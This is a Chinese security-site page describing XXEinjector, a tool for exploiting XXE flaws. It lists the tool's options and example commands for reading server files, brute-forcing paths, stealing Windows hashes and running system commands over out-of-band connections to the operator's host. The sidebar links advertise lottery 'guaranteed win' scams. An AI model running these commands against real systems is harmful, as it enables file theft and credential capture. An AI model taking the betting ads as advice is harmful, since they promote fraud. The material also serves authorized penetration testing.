ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → XXEinjector 自动开发XXE漏洞的工具

XXEinjector 自动开发XXE漏洞的工具

时间:2018-06-13 07:00:02人气:作者:本站作者我要评论

XXEinjector使用直接和带外方法自动检索文件。目录列表仅适用于Java应用程序。Bruteforcing方法需要用于其他应用程序。

XXEinjector 自动开发XXE漏洞的工具

选项

  1. --host     Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
  2. --file     Mandatory - file containing valid HTTP request with xml. You can also mark
  3.             with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
  4. --path     Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
  5. --brute     Mandatory if bruteforcing files - File with paths to bruteforce.
  6.             (--brute=/tmp/brute.txt)
  7. --logger    Log results only. Do not send requests. HTTP logger looks for "p" parameter
  8.             with results.
  9. --rhost     Remote host's IP address or domain name. Use this argument only for requests
  10.             without Host header. (--rhost=192.168.0.3)
  11. --rport     Remote host's TCP port. Use this argument only for requests without Host
  12.             header and for non-default values. (--rport=8080)
  13. --oob       Out of Band exploitation method. FTP is default. FTP can be used in any
  14.             application. HTTP can be used for bruteforcing and enumeration through
  15.             directory listing in Java < 1.7 applications. Gopher can only be used in
  16.             Java < 1.7 applications. (--oob=http/ftp/gopher)
  17. --direct    Use direct exploitation instead of out of band. Unique mark should be
  18.             specified as a value for this argument. This mark specifies where results
  19.             of XXE start and end. Specify --xml to see how XML in request file should
  20.             look like. (--direct=UNIQUEMARK)
  21. --cdata     Improve direct exploitation with CDATA. Data is retrieved directly, however
  22.             OOB is used to construct CDATA payload. Specify --cdata-xml to see how
  23.             request should look like in this technique.
  24. --2ndfile   File containing valid HTTP request used in second order exploitation.
  25.             (--2ndfile=/tmp/2ndreq.txt)
  26. --phpfilter Use PHP filter to base64 encode target file before sending.
  27. --netdoc    Use netdoc protocol instead of file (Java).
  28. --enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to
  29.             enumerate all TCP ports. (--enumports=21,22,80,443,445)
  30. --hashes    Steals Windows hash of the user that runs an application.
  31. --expect    Uses PHP expect extension to execute arbitrary system command. Best works
  32.             with HTTP and PHP filter. (--expect=ls)
  33. --upload    Uploads specified file using Java jar schema into temp file.
  34.             (--upload=/tmp/upload.txt)
  35. --xslt     Tests for XSLT injection.
  36. --ssl       Use SSL.
  37. --proxy     Proxy to use. (--proxy=127.0.0.1:8080)
  38. --httpport  Set custom HTTP port. (--httpport=80)
  39. --ftpport   Set custom FTP port. (--ftpport=21)
  40. --gopherport Set custom gopher port. (--gopherport=70)
  41. --jarport    Set custom port for uploading files using jar. (--jarport=1337)
  42. --xsltport   Set custom port for XSLT injection test. (--xsltport=1337)
  43. --test     This mode shows request with injected payload and quits. Used to verify
  44.             correctness of request without sending it to a server.
  45. --urlencode URL encode injected DTD. This is default for URI.
  46. --nodtd     If you want to put DTD in request by yourself. Specify "--dtd" to show
  47.             how DTD should look like.
  48. --output    Output file for bruteforcing and logger mode. By default it logs to
  49.             brute.log in current directory. (--output=/tmp/out.txt)
  50. --timeout   Timeout for receiving file/directory content. (--timeout=20)
  51. --contimeout Timeout for closing connection with server. This is used to prevent
  52.                 DoS condition. (--contimeout=20)
  53. --fast     Skip asking what to enumerate. Prone to false-positives.
  54. --verbose   Show verbose messages.

用法举例

  1. Enumerating /etc directory in HTTPS application:
  2. ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
  3. Enumerating /etc directory using gopher for OOB method:
  4. ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
  5. Second order exploitation:
  6. ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt
  7. --2ndfile=/tmp/2ndreq.txt
  8. Bruteforcing files using HTTP out of band method and netdoc protocol:
  9. ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt
  10. --oob=http --netdoc
  11. Enumerating using direct exploitation:
  12. ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
  13. Enumerating unfiltered ports:
  14. ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
  15. Stealing Windows hashes:
  16. ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
  17. Uploading files using Java jar:
  18. ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
  19. Executing system commands using PHP expect:
  20. ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter
  21. --expect=ls
  22. Testing for XSLT injection:
  23. ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
  24. Log requests only:
  25. ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

下载

部分内容被隐藏
需登陆后可查看

相关文章

猜你喜欢

  • 深入解析浅谈《快3单双准确率方法》成功方案

    2022-09-28 /

  • 全网首发《快3单双大小必中方法技巧》思路汇总

    2022-09-28 /

  • 资深攻略《快3大小必中技巧》上岸方法

    2022-09-28 /

  • 【最准确的玩法】《回血上岸计划导师QQ》操作系列

    2022-09-28 /

  • 经验教程《导师一分快三计划》最新窍门

    2022-09-28 /

  • 高手教你《大小单双最安全的打法》三期必中

    2022-09-28 /

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网